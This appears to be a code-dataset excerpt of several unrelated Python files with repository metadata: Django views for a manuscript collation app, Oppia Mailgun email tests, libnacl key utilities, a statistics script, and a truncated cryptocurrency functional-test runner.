null
null
dcodex_carlson/views.py
rbturnbull/dcodex_carlson
e662e58ad38915b10f079075d69adae463dd7ecd
[ "Apache-2.0" ]
null
null
null
dcodex_carlson/views.py
rbturnbull/dcodex_carlson
e662e58ad38915b10f079075d69adae463dd7ecd
[ "Apache-2.0" ]
null
null
null
from django.shortcuts import render # Create your views here. from django.http import HttpResponse from django.contrib.auth.decorators import login_required from django.shortcuts import get_object_or_404, render from dcodex.util import get_request_dict import logging from .models import * def index(request): return HttpResponse("Hello, world. You're at the DCodex Carlson index.") def location_siglum( request, location_id, siglum_text ): location = get_object_or_404(Location, id=location_id) sublocations = location.sublocation_set.all() siglum = get_object_or_404(Siglum, name=siglum_text) collation = location.collation_set.first() siglum = get_object_or_404(Siglum, name=siglum_text) verse_labels = location.closest_verse_labels().all() transcription = None manuscript = None bible_verse = None if siglum.witness.manuscript and len(verse_labels) > 0: manuscript = siglum.witness.manuscript bible_verse = verse_labels[0].bible_verse() transcription = manuscript.transcription( bible_verse ) attestation = siglum.witness.get_attestation( sublocation=sublocation, parallel=parallel, corrector=corrector ) return render(request, 'dcodex_carlson/location.html', {'location': location, 'manuscript':manuscript, 'bible_verse':bible_verse, 'transcription':transcription, 'sublocations': sublocations, 'siglum':siglum, 'witness':siglum.witness, 'parallel':None, 'verse_labels':verse_labels,} ) def location_siglum_parallel( request, location_id, siglum_text, parallel_code ): location = get_object_or_404(Location, id=location_id) sublocations = location.sublocation_set.all() siglum = get_object_or_404(Siglum, name=siglum_text) parallel = get_object_or_404(Parallel, code=parallel_code) verse_labels = [verse_label for verse_label in location.closest_verse_labels().all() if verse_label.parallel == parallel] transcription = None manuscript = None bible_verse = None if siglum.witness.manuscript and len(verse_labels) > 0: manuscript = siglum.witness.manuscript bible_verse = verse_labels[0].bible_verse() transcription = manuscript.transcription( bible_verse ) return render(request, 'dcodex_carlson/location.html', {'location': location, 'manuscript':manuscript, 'bible_verse':bible_verse,'transcription':transcription, 'sublocations': sublocations, 'siglum':siglum, 'witness':siglum.witness, 'parallel':parallel, 'verse_labels':verse_labels,} ) def location( request, location_id ): location = get_object_or_404(Location, id=location_id) sublocations = location.sublocation_set.all() return render(request, 'dcodex_carlson/location.html', {'location': location, 'sublocations': sublocations} ) def attestations( request ): request_dict = get_request_dict(request) reading_code = request_dict.get('code') sublocation_id = request_dict.get('sublocation_id') sublocation = get_object_or_404(SubLocation, id=sublocation_id) parallels = sublocation.get_parallels() html = "" for parallel in parallels: parallel_switch = "" if parallel: parallel_switch = "/%s " % parallel.code html += "<div>" + str(parallel_switch) + sublocation.code_attestations_string(reading_code, parallel) + "</div>" return HttpResponse(html) def set_attestation( request ): request_dict = get_request_dict(request) reading_code = request_dict.get('code') corrector = request_dict.get('corrector') sublocation_id = request_dict.get('sublocation_id') sublocation = get_object_or_404(SubLocation, id=sublocation_id) witness_id = request_dict.get('witness_id') witness = get_object_or_404(Witness, id=witness_id) parallel = None parallel_id = request_dict.get('parallel_id') parallel_code = request_dict.get('parallel_code') if parallel_id: parallel = get_object_or_404(Parallel, id=parallel_id) elif parallel_code: parallel = get_object_or_404(Parallel, code=parallel_code) logger = logging.getLogger(__name__) logger.error("Parallel in view") logger.error(parallel) response = witness.set_attestation( sublocation=sublocation, code=reading_code, parallel=parallel, corrector=corrector ) return HttpResponse("OK" if response else "FAIL") def set_text( request ): request_dict = get_request_dict(request) corrector = request_dict.get('corrector') sublocation_id = request_dict.get('sublocation_id') sublocation = get_object_or_404(SubLocation, id=sublocation_id) witness_id = request_dict.get('witness_id') witness = get_object_or_404(Witness, id=witness_id) parallel = None parallel_id = request_dict.get('parallel_id') parallel_code = request_dict.get('parallel_code') if parallel_id: parallel = get_object_or_404(Parallel, id=parallel_id) elif parallel_code: parallel = get_object_or_404(Parallel, code=parallel_code) logger = logging.getLogger(__name__) logger.error("Parallel in view") logger.error(parallel) attestation = witness.get_attestation( sublocation=sublocation, parallel=parallel, corrector=corrector ) if attestation: attestation.text = request_dict.get('text') attestation.save() return HttpResponse("OK") return HttpResponse("FAIL")
37.101351
289
0.726097
72078488953ec5a998650e2c840d109b1e067013
10,255
py
Python
core/platform/email/mailgun_email_services_test.py
yash10019coder/oppia
8c349c61ac723a2fd507046b20957934cba70e3a
[ "Apache-2.0" ]
5
2022-01-22T17:22:23.000Z
2022-02-04T09:21:24.000Z
core/platform/email/mailgun_email_services_test.py
yash10019coder/oppia
8c349c61ac723a2fd507046b20957934cba70e3a
[ "Apache-2.0" ]
null
null
null
core/platform/email/mailgun_email_services_test.py
yash10019coder/oppia
8c349c61ac723a2fd507046b20957934cba70e3a
[ "Apache-2.0" ]
2
2022-03-22T16:57:32.000Z
2022-03-24T17:38:42.000Z
# coding: utf-8 # # Copyright 2014 The Oppia Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for the Mailgun API wrapper.""" from __future__ import annotations import urllib from core import feconf from core import utils from core.platform.email import mailgun_email_services from core.tests import test_utils from typing import Dict, Tuple MailgunQueryType = Tuple[str, bytes, Dict[str, str]] class EmailTests(test_utils.GenericTestBase): """Tests for sending emails.""" class Response: """Class to mock python_utils.url_open responses.""" def __init__( self, url: MailgunQueryType, expected_url: MailgunQueryType ) -> None: self.url = url self.expected_url = expected_url def getcode(self) -> int: """Gets the status code of this url_open mock. Returns: int. 200 to signify status is OK. 500 otherwise. """ return 200 if self.url == self.expected_url else 500 def test_send_email_to_mailgun(self) -> None: """Test for sending HTTP POST request.""" # Test sending email without bcc, reply_to or recipient_variables. expected_query_url: MailgunQueryType = ( 'https://api.mailgun.net/v3/domain/messages', b'from=a%40a.com&' b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&' b'text=plaintext_body+%F0%9F%98%82&' b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&' b'to=b%40b.com&' b'recipient_variables=%7B%7D', {'Authorization': 'Basic YXBpOmtleQ=='} ) swapped_urlopen = lambda x: self.Response(x, expected_query_url) swapped_request = lambda *args: args swap_urlopen_context = self.swap( utils, 'url_open', swapped_urlopen) swap_request_context = self.swap( urllib.request, 'Request', swapped_request) swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key') swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain') with swap_urlopen_context, swap_request_context, swap_api, swap_domain: resp = mailgun_email_services.send_email_to_recipients( 'a@a.com', ['b@b.com'], 'Hola 😂 - invitation to collaborate', 'plaintext_body 😂', 'Hi abc,<br> 😂') self.assertTrue(resp) # Test sending email with single bcc and single recipient email. expected_query_url = ( 'https://api.mailgun.net/v3/domain/messages', b'from=a%40a.com&' b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&' b'text=plaintext_body+%F0%9F%98%82&' b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&' b'to=b%40b.com&' b'bcc=c%40c.com&' b'h%3AReply-To=abc&' b'recipient_variables=%7B%27b%40b.com' b'%27%3A+%7B%27first%27%3A+%27Bob%27%2C+%27id%27%3A+1%7D%7D', {'Authorization': 'Basic YXBpOmtleQ=='}) swapped_urlopen = lambda x: self.Response(x, expected_query_url) swap_urlopen_context = self.swap( utils, 'url_open', swapped_urlopen) swap_request_context = self.swap( urllib.request, 'Request', swapped_request) swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key') swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain') with swap_urlopen_context, swap_request_context, swap_api, swap_domain: resp = mailgun_email_services.send_email_to_recipients( 'a@a.com', ['b@b.com'], 'Hola 😂 - invitation to collaborate', 'plaintext_body 😂', 'Hi abc,<br> 😂', bcc=['c@c.com'], reply_to='abc', recipient_variables={'b@b.com': {'first': 'Bob', 'id': 1}}) self.assertTrue(resp) # Test sending email with single bcc, and multiple recipient emails # differentiated by recipient_variables ids. expected_query_url = ( 'https://api.mailgun.net/v3/domain/messages', b'from=a%40a.com&' b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&' b'text=plaintext_body+%F0%9F%98%82&' b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&' b'to=b%40b.com&' b'bcc=%5B%27c%40c.com%27%2C+%27d%40d.com%27%5D&' b'h%3AReply-To=abc&' b'recipient_variables=%7B%27b%40b.com' b'%27%3A+%7B%27first%27%3A+%27Bob%27%2C+%27id%27%3A+1%7D%7D', {'Authorization': 'Basic YXBpOmtleQ=='}) swapped_urlopen = lambda x: self.Response(x, expected_query_url) swap_urlopen_context = self.swap( utils, 'url_open', swapped_urlopen) swap_request_context = self.swap( urllib.request, 'Request', swapped_request) swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key') swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain') with swap_urlopen_context, swap_request_context, swap_api, swap_domain: resp = mailgun_email_services.send_email_to_recipients( 'a@a.com', ['b@b.com'], 'Hola 😂 - invitation to collaborate', 'plaintext_body 😂', 'Hi abc,<br> 😂', bcc=['c@c.com', 'd@d.com'], reply_to='abc', recipient_variables=({'b@b.com': {'first': 'Bob', 'id': 1}})) self.assertTrue(resp) def test_batch_send_to_mailgun(self) -> None: """Test for sending HTTP POST request.""" expected_query_url: MailgunQueryType = ( 'https://api.mailgun.net/v3/domain/messages', b'from=a%40a.com&' b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&' b'text=plaintext_body+%F0%9F%98%82&' b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&' b'to=%5B%27b%40b.com%27%2C+%27c%40c.com%27%2C+%27d%40d.com%27%5D&' b'recipient_variables=%7B%7D', {'Authorization': 'Basic YXBpOmtleQ=='}) swapped_urlopen = lambda x: self.Response(x, expected_query_url) swapped_request = lambda *args: args swap_urlopen_context = self.swap( utils, 'url_open', swapped_urlopen) swap_request_context = self.swap( urllib.request, 'Request', swapped_request) swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key') swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain') with swap_urlopen_context, swap_request_context, swap_api, swap_domain: resp = mailgun_email_services.send_email_to_recipients( 'a@a.com', ['b@b.com', 'c@c.com', 'd@d.com'], 'Hola 😂 - invitation to collaborate', 'plaintext_body 😂', 'Hi abc,<br> 😂') self.assertTrue(resp) def test_mailgun_key_or_domain_name_not_set_raises_exception(self) -> None: """Test that exceptions are raised when API key or domain name are unset. """ # Testing no mailgun api key. mailgun_exception = self.assertRaisesRegex( # type: ignore[no-untyped-call] Exception, 'Mailgun API key is not available.') with mailgun_exception: mailgun_email_services.send_email_to_recipients( 'a@a.com', ['b@b.com', 'c@c.com', 'd@d.com'], 'Hola 😂 - invitation to collaborate', 'plaintext_body 😂', 'Hi abc,<br> 😂') # Testing no mailgun domain name. swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key') mailgun_exception = self.assertRaisesRegex( # type: ignore[no-untyped-call] Exception, 'Mailgun domain name is not set.') with swap_api, mailgun_exception: mailgun_email_services.send_email_to_recipients( 'a@a.com', ['b@b.com', 'c@c.com', 'd@d.com'], 'Hola 😂 - invitation to collaborate', 'plaintext_body 😂', 'Hi abc,<br> 😂') def test_invalid_status_code_returns_false(self) -> None: expected_query_url: MailgunQueryType = ( 'https://api.mailgun.net/v3/domain/messages', b'from=a%40a.com&' b'subject=Hola+%F0%9F%98%82+-+invitation+to+collaborate&' b'text=plaintext_body+%F0%9F%98%82&' b'html=Hi+abc%2C%3Cbr%3E+%F0%9F%98%82&' b'to=%5B%27b%40b.com%27%2C+%27c%40c.com%27%2C+%27d%40d.com%27%5D&' b'recipient_variables=%7B%7D', {'Authorization': 'Basic'}) swapped_request = lambda *args: args swapped_urlopen = lambda x: self.Response(x, expected_query_url) swap_urlopen_context = self.swap( utils, 'url_open', swapped_urlopen) swap_request_context = self.swap( urllib.request, 'Request', swapped_request) swap_api = self.swap(feconf, 'MAILGUN_API_KEY', 'key') swap_domain = self.swap(feconf, 'MAILGUN_DOMAIN_NAME', 'domain') with swap_urlopen_context, swap_request_context, swap_api, swap_domain: resp = mailgun_email_services.send_email_to_recipients( 'a@a.com', ['b@b.com'], 'Hola 😂 - invitation to collaborate', 'plaintext_body 😂', 'Hi abc,<br> 😂', bcc=['c@c.com', 'd@d.com'], reply_to='abc', recipient_variables=({'b@b.com': {'first': 'Bob', 'id': 1}})) self.assertFalse(resp)
44.202586
83
0.589664
e06e07866618de5a5ea2a24026b3f29f2cafe3f8
3,027
py
Python
libnacl/utils.py
jensbjorgensen/libnacl
390f439ba5e5d5247464dda523c211132cc5faf9
[ "Apache-2.0" ]
61
2015-01-13T17:50:09.000Z
2022-02-12T04:32:10.000Z
libnacl/utils.py
jensbjorgensen/libnacl
390f439ba5e5d5247464dda523c211132cc5faf9
[ "Apache-2.0" ]
73
2015-01-03T00:52:41.000Z
2021-07-16T17:28:57.000Z
libnacl/utils.py
jensbjorgensen/libnacl
390f439ba5e5d5247464dda523c211132cc5faf9
[ "Apache-2.0" ]
50
2015-01-02T21:07:00.000Z
2022-02-11T18:15:23.000Z
# -*- coding: utf-8 -*- import struct import sys import time # Import nacl libs import libnacl import libnacl.encode import libnacl.secret import libnacl.public import libnacl.sign import libnacl.dual def load_key(path_or_file, serial='json'): ''' Read in a key from a file and return the applicable key object based on the contents of the file ''' if hasattr(path_or_file, 'read'): stream = path_or_file else: if serial == 'json': stream = open(path_or_file, 'r') else: stream = open(path_or_file, 'rb') try: if serial == 'msgpack': import msgpack key_data = msgpack.load(stream) elif serial == 'json': import json if sys.version_info[0] >= 3: key_data = json.loads(stream.read()) else: key_data = json.loads(stream.read(), encoding='UTF-8') finally: if stream != path_or_file: stream.close() if 'priv' in key_data and 'sign' in key_data and 'pub' in key_data: return libnacl.dual.DualSecret( libnacl.encode.hex_decode(key_data['priv']), libnacl.encode.hex_decode(key_data['sign'])) elif 'priv' in key_data and 'pub' in key_data: return libnacl.public.SecretKey( libnacl.encode.hex_decode(key_data['priv'])) elif 'sign' in key_data: return libnacl.sign.Signer( libnacl.encode.hex_decode(key_data['sign'])) elif 'pub' in key_data: return libnacl.public.PublicKey( libnacl.encode.hex_decode(key_data['pub'])) elif 'verify' in key_data: return libnacl.sign.Verifier(key_data['verify']) elif 'priv' in key_data: return libnacl.secret.SecretBox( libnacl.encode.hex_decode(key_data['priv'])) raise ValueError('Found no key data') def salsa_key(): ''' Generates a salsa2020 key ''' return libnacl.randombytes(libnacl.crypto_secretbox_KEYBYTES) def aead_key(): ''' Generates an AEAD key (both implementations use the same size) ''' return libnacl.randombytes(libnacl.crypto_aead_aes256gcm_KEYBYTES) def rand_aead_nonce(): ''' Generates and returns a random bytestring of the size defined in libsodium as crypto_aead_aes256gcm_NPUBBYTES and crypto_aead_chacha20poly1305_ietf_NPUBBYTES ''' return libnacl.randombytes(libnacl.crypto_aead_aes256gcm_NPUBBYTES) def rand_nonce(): ''' Generates and returns a random bytestring of the size defined in libsodium as crypto_box_NONCEBYTES ''' return libnacl.randombytes(libnacl.crypto_box_NONCEBYTES) def time_nonce(): ''' Generates and returns a nonce as in rand_nonce() but using a timestamp for the first 8 bytes. This function now exists mostly for backwards compatibility, as rand_nonce() is usually preferred. ''' nonce = rand_nonce() return (struct.pack('=d', time.time()) + nonce)[:len(nonce)]
29.676471
102
0.647836
134434cd44bf7e46390ab3ce992beb4311c0af5f
1,415
py
Python
013-C109-BellCurve-2/__main__.py
somePythonProgrammer/PythonCode
fb2b2245db631cefd916a960768f411969b0e78f
[ "MIT" ]
2
2021-09-28T13:55:20.000Z
2021-11-15T10:08:49.000Z
013-C109-BellCurve-2/__main__.py
somePythonProgrammer/PythonCode
fb2b2245db631cefd916a960768f411969b0e78f
[ "MIT" ]
null
null
null
013-C109-BellCurve-2/__main__.py
somePythonProgrammer/PythonCode
fb2b2245db631cefd916a960768f411969b0e78f
[ "MIT" ]
1
2022-01-20T03:02:20.000Z
2022-01-20T03:02:20.000Z
# 013-C109-BellCurve-2 # This is a python script made by @somePythonProgrammer # for a WhiteHat Junior project. import pandas as pd import plotly.figure_factory as ff import statistics df = pd.read_csv('013-C109-BellCurve-2/csv/students.csv') scores = df['math score'].tolist() mean_ = statistics.mean(scores) median_ = statistics.median(scores) mode_ = statistics.mode(scores) stdev_ = statistics.stdev(scores) print(f'Mean: {mean_}') print(f'Median: {median_}') print(f'Mode: {mode_}') print(f'Standard Deviation: {stdev_}') # get percent of values between 1st standard deviation count = 0 for score in scores: if score > mean_ - stdev_ and score < mean_ + stdev_: count += 1 _1perc = (count / len(scores))*100 print('1st Standard Deviation:', _1perc, '%') # get percent of values between 2nd standard deviation count = 0 for score in scores: if score > mean_ - (stdev_ * 2) and score < mean_ + (stdev_ * 2): count += 1 _2perc = (count / len(scores))*100 print('2nd Standard Deviation:', _2perc, '%') # get percent of values between 3rd standard deviation count = 0 for score in scores: if score > mean_ - (stdev_ * 3) and score < mean_ + (stdev_ * 3): count += 1 _3perc = (count / len(scores))*100 print('3rd Standard Deviation:', _3perc, '%') figure = ff.create_distplot([scores], ['Math Scores']) figure.write_html('013-C109-BellCurve-2/index.html', auto_open=True)
29.479167
69
0.69894
6e19e9d0688799f4278e23abcec0825f6d24d98e
25,319
py
Python
test/functional/test_runner.py
percussionpc/grovcoina
900c37d969a8876a66e87e6d94e9c1ec9e847bfe
[ "MIT" ]
null
null
null
test/functional/test_runner.py
percussionpc/grovcoina
900c37d969a8876a66e87e6d94e9c1ec9e847bfe
[ "MIT" ]
null
null
null
test/functional/test_runner.py
percussionpc/grovcoina
900c37d969a8876a66e87e6d94e9c1ec9e847bfe
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # Copyright (c) 2014-2018 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Run regression test suite. This module calls down into individual test cases via subprocess. It will forward all unrecognized arguments onto the individual test scripts. For a description of arguments recognized by test scripts, see `test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`. """ import argparse from collections import deque import configparser import datetime import os import time import shutil import signal import sys import subprocess import tempfile import re import logging # Formatting. Default colors to empty strings. BOLD, GREEN, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "") try: # Make sure python thinks it can write unicode to its stdout "\u2713".encode("utf_8").decode(sys.stdout.encoding) TICK = "✓ " CROSS = "✖ " CIRCLE = "○ " except UnicodeDecodeError: TICK = "P " CROSS = "x " CIRCLE = "o " if os.name != 'nt' or sys.getwindowsversion() >= (10, 0, 14393): if os.name == 'nt': import ctypes kernel32 = ctypes.windll.kernel32 ENABLE_VIRTUAL_TERMINAL_PROCESSING = 4 STD_OUTPUT_HANDLE = -11 STD_ERROR_HANDLE = -12 # Enable ascii color control to stdout stdout = kernel32.GetStdHandle(STD_OUTPUT_HANDLE) stdout_mode = ctypes.c_int32() kernel32.GetConsoleMode(stdout, ctypes.byref(stdout_mode)) kernel32.SetConsoleMode(stdout, stdout_mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING) # Enable ascii color control to stderr stderr = kernel32.GetStdHandle(STD_ERROR_HANDLE) stderr_mode = ctypes.c_int32() kernel32.GetConsoleMode(stderr, ctypes.byref(stderr_mode)) kernel32.SetConsoleMode(stderr, stderr_mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING) # primitive formatting on supported # terminal via ANSI escape sequences: BOLD = ('\033[0m', '\033[1m') GREEN = ('\033[0m', '\033[0;32m') RED = ('\033[0m', '\033[0;31m') GREY = ('\033[0m', '\033[1;30m') TEST_EXIT_PASSED = 0 TEST_EXIT_SKIPPED = 77 BASE_SCRIPTS = [ # Scripts that are run by the travis build process. # Longest test should go first, to favor running tests in parallel 'feature_fee_estimation.py', 'wallet_hd.py', 'wallet_backup.py', # vv Tests less than 5m vv 'mining_getblocktemplate_longpoll.py', 'feature_maxuploadtarget.py', 'feature_block.py', 'rpc_fundrawtransaction.py', 'p2p_compactblocks.py', 'feature_segwit.py', # vv Tests less than 2m vv 'wallet_basic.py', 'wallet_labels.py', 'p2p_segwit.py', 'p2p_timeouts.py', 'wallet_dump.py', 'wallet_listtransactions.py', # vv Tests less than 60s vv 'p2p_sendheaders.py', 'wallet_zapwallettxes.py', 'wallet_importmulti.py', 'mempool_limit.py', 'rpc_txoutproof.py', 'wallet_listreceivedby.py', 'wallet_abandonconflict.py', 'feature_csv_activation.py', 'rpc_rawtransaction.py', 'wallet_address_types.py', 'feature_bip68_sequence.py', 'p2p_feefilter.py', 'feature_reindex.py', # vv Tests less than 30s vv 'wallet_keypool_topup.py', 'interface_zmq.py', 'interface_bitcoin_cli.py', 'mempool_resurrect.py', 'wallet_txn_doublespend.py --mineblock', 'tool_wallet.py', 'wallet_txn_clone.py', 'wallet_txn_clone.py --segwit', 'rpc_getchaintips.py', 'rpc_misc.py', 'interface_rest.py', 'mempool_spend_coinbase.py', 'mempool_reorg.py', 'mempool_persist.py', 'wallet_multiwallet.py', 'wallet_multiwallet.py --usecli', 'wallet_createwallet.py', 'wallet_createwallet.py --usecli', 'interface_http.py', 'interface_rpc.py', 'rpc_psbt.py', 'rpc_users.py', 'feature_proxy.py', 'rpc_signrawtransaction.py', 'wallet_groups.py', 'p2p_disconnect_ban.py', 'rpc_decodescript.py', 'rpc_blockchain.py', 'rpc_deprecated.py', 'wallet_disable.py', 'rpc_net.py', 'wallet_keypool.py', 'p2p_mempool.py', 'p2p_blocksonly.py', 'mining_prioritisetransaction.py', 'p2p_invalid_locator.py', 'p2p_invalid_block.py', 'p2p_invalid_messages.py', 'p2p_invalid_tx.py', 'feature_assumevalid.py', 'example_test.py', 'wallet_txn_doublespend.py', 'wallet_txn_clone.py --mineblock', 'feature_notifications.py', 'rpc_invalidateblock.py', 'feature_rbf.py', 'mempool_packages.py', 'rpc_createmultisig.py', 'feature_versionbits_warning.py', 'rpc_preciousblock.py', 'wallet_importprunedfunds.py', 'p2p_leak_tx.py', 'rpc_signmessage.py', 'wallet_balance.py', 'feature_nulldummy.py', 'mempool_accept.py', 'wallet_import_rescan.py', 'wallet_import_with_label.py', 'rpc_bind.py --ipv4', 'rpc_bind.py --ipv6', 'rpc_bind.py --nonloopback', 'mining_basic.py', 'wallet_bumpfee.py', 'rpc_named_arguments.py', 'wallet_listsinceblock.py', 'p2p_leak.py', 'wallet_encryption.py', 'wallet_scriptaddress2.py', 'feature_dersig.py', 'feature_cltv.py', 'rpc_uptime.py', 'wallet_resendwallettransactions.py', 'wallet_fallbackfee.py', 'feature_minchainwork.py', 'rpc_getblockstats.py', 'wallet_create_tx.py', 'p2p_fingerprint.py', 'feature_uacomment.py', 'wallet_coinbase_category.py', 'feature_filelock.py', 'p2p_unrequested_blocks.py', 'feature_includeconf.py', 'rpc_deriveaddresses.py', 'rpc_deriveaddresses.py --usecli', 'rpc_scantxoutset.py', 'feature_logging.py', 'p2p_node_network_limited.py', 'feature_blocksdir.py', 'feature_config_args.py', 'rpc_help.py', 'feature_help.py', 'feature_shutdown.py', # Don't append tests at the end to avoid merge conflicts # Put them in a random line within the section that fits their approximate run-time ] EXTENDED_SCRIPTS = [ # These tests are not run by the travis build process. # Longest test should go first, to favor running tests in parallel 'feature_pruning.py', 'feature_dbcrash.py', ] # Place EXTENDED_SCRIPTS first since it has the 3 longest running tests ALL_SCRIPTS = EXTENDED_SCRIPTS + BASE_SCRIPTS NON_SCRIPTS = [ # These are python files that live in the functional tests directory, but are not test scripts. "combine_logs.py", "create_cache.py", "test_runner.py", ] def main(): # Parse arguments and pass through unrecognised args parser = argparse.ArgumentParser(add_help=False, usage='%(prog)s [test_runner.py options] [script options] [scripts]', description=__doc__, epilog=''' Help text and arguments for individual test script:''', formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('--combinedlogslen', '-c', type=int, default=0, metavar='n', help='On failure, print a log (of length n lines) to the console, combined from the test framework and all test nodes.') parser.add_argument('--coverage', action='store_true', help='generate a basic coverage report for the RPC interface') parser.add_argument('--ci', action='store_true', help='Run checks and code that are usually only enabled in a continuous integration environment') parser.add_argument('--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.') parser.add_argument('--extended', action='store_true', help='run the extended test suite in addition to the basic tests') parser.add_argument('--help', '-h', '-?', action='store_true', help='print help text and exit') parser.add_argument('--jobs', '-j', type=int, default=4, help='how many test scripts to run in parallel. Default=4.') parser.add_argument('--keepcache', '-k', action='store_true', help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.') parser.add_argument('--quiet', '-q', action='store_true', help='only print dots, results summary and failure logs') parser.add_argument('--tmpdirprefix', '-t', default=tempfile.gettempdir(), help="Root directory for datadirs") parser.add_argument('--failfast', action='store_true', help='stop execution after the first test failure') args, unknown_args = parser.parse_known_args() # args to be passed on always start with two dashes; tests are the remaining unknown args tests = [arg for arg in unknown_args if arg[:2] != "--"] passon_args = [arg for arg in unknown_args if arg[:2] == "--"] # Read config generated by configure. config = configparser.ConfigParser() configfile = os.path.abspath(os.path.dirname(__file__)) + "/../config.ini" config.read_file(open(configfile, encoding="utf8")) passon_args.append("--configfile=%s" % configfile) # Set up logging logging_level = logging.INFO if args.quiet else logging.DEBUG logging.basicConfig(format='%(message)s', level=logging_level) # Create base test directory tmpdir = "%s/test_runner_Ł_🏃_%s" % (args.tmpdirprefix, datetime.datetime.now().strftime("%Y%m%d_%H%M%S")) os.makedirs(tmpdir) logging.debug("Temporary test directory at %s" % tmpdir) enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND") if not enable_bitcoind: print("No functional tests to run.") print("Rerun ./configure with --with-daemon and then make") sys.exit(0) # Build list of tests test_list = [] if tests: # Individual tests have been specified. Run specified tests that exist # in the ALL_SCRIPTS list. Accept the name with or without .py extension. tests = [test + ".py" if ".py" not in test else test for test in tests] for test in tests: if test in ALL_SCRIPTS: test_list.append(test) else: print("{}WARNING!{} Test '{}' not found in full test list.".format(BOLD[1], BOLD[0], test)) elif args.extended: # Include extended tests test_list += ALL_SCRIPTS else: # Run base tests only test_list += BASE_SCRIPTS # Remove the test cases that the user has explicitly asked to exclude. if args.exclude: exclude_tests = [test.split('.py')[0] for test in args.exclude.split(',')] for exclude_test in exclude_tests: # Remove <test_name>.py and <test_name>.py --arg from the test list exclude_list = [test for test in test_list if test.split('.py')[0] == exclude_test] for exclude_item in exclude_list: test_list.remove(exclude_item) if not exclude_list: print("{}WARNING!{} Test '{}' not found in current test list.".format(BOLD[1], BOLD[0], exclude_test)) if not test_list: print("No valid test scripts specified. Check that your test is in one " "of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests") sys.exit(0) if args.help: # Print help for test_runner.py, then print help of the first script (with args removed) and exit. parser.print_help() subprocess.check_call([sys.executable, os.path.join(config["environment"]["SRCDIR"], 'test', 'functional', test_list[0].split()[0]), '-h']) sys.exit(0) check_script_list(src_dir=config["environment"]["SRCDIR"], fail_on_warn=args.ci) check_script_prefixes() if not args.keepcache: shutil.rmtree("%s/test/cache" % config["environment"]["BUILDDIR"], ignore_errors=True) run_tests( test_list=test_list, src_dir=config["environment"]["SRCDIR"], build_dir=config["environment"]["BUILDDIR"], tmpdir=tmpdir, jobs=args.jobs, enable_coverage=args.coverage, args=passon_args, combined_logs_len=args.combinedlogslen, failfast=args.failfast, runs_ci=args.ci, ) def run_tests(*, test_list, src_dir, build_dir, tmpdir, jobs=1, enable_coverage=False, args=None, combined_logs_len=0, failfast=False, runs_ci): args = args or [] # Warn if bitcoind is already running (unix only) try: if subprocess.check_output(["pidof", "grovcoind"]) is not None: print("%sWARNING!%s There is already a grovcoind process running on this system. Tests may fail unexpectedly due to resource contention!" % (BOLD[1], BOLD[0])) except (OSError, subprocess.SubprocessError): pass # Warn if there is a cache directory cache_dir = "%s/test/cache" % build_dir if os.path.isdir(cache_dir): print("%sWARNING!%s There is a cache directory here: %s. If tests fail unexpectedly, try deleting the cache directory." % (BOLD[1], BOLD[0], cache_dir)) tests_dir = src_dir + '/test/functional/' flags = ['--cachedir={}'.format(cache_dir)] + args if enable_coverage: coverage = RPCCoverage() flags.append(coverage.flag) logging.debug("Initializing coverage directory at %s" % coverage.dir) else: coverage = None if len(test_list) > 1 and jobs > 1: # Populate cache try: subprocess.check_output([sys.executable, tests_dir + 'create_cache.py'] + flags + ["--tmpdir=%s/cache" % tmpdir]) except subprocess.CalledProcessError as e: sys.stdout.buffer.write(e.output) raise #Run Tests job_queue = TestHandler( num_tests_parallel=jobs, tests_dir=tests_dir, tmpdir=tmpdir, test_list=test_list, flags=flags, timeout_duration=40 * 60 if runs_ci else float('inf'), # in seconds ) start_time = time.time() test_results = [] max_len_name = len(max(test_list, key=len)) test_count = len(test_list) for i in range(test_count): test_result, testdir, stdout, stderr = job_queue.get_next() test_results.append(test_result) done_str = "{}/{} - {}{}{}".format(i + 1, test_count, BOLD[1], test_result.name, BOLD[0]) if test_result.status == "Passed": logging.debug("%s passed, Duration: %s s" % (done_str, test_result.time)) elif test_result.status == "Skipped": logging.debug("%s skipped" % (done_str)) else: print("%s failed, Duration: %s s\n" % (done_str, test_result.time)) print(BOLD[1] + 'stdout:\n' + BOLD[0] + stdout + '\n') print(BOLD[1] + 'stderr:\n' + BOLD[0] + stderr + '\n') if combined_logs_len and os.path.isdir(testdir): # Print the final `combinedlogslen` lines of the combined logs print('{}Combine the logs and print the last {} lines ...{}'.format(BOLD[1], combined_logs_len, BOLD[0])) print('\n============') print('{}Combined log for 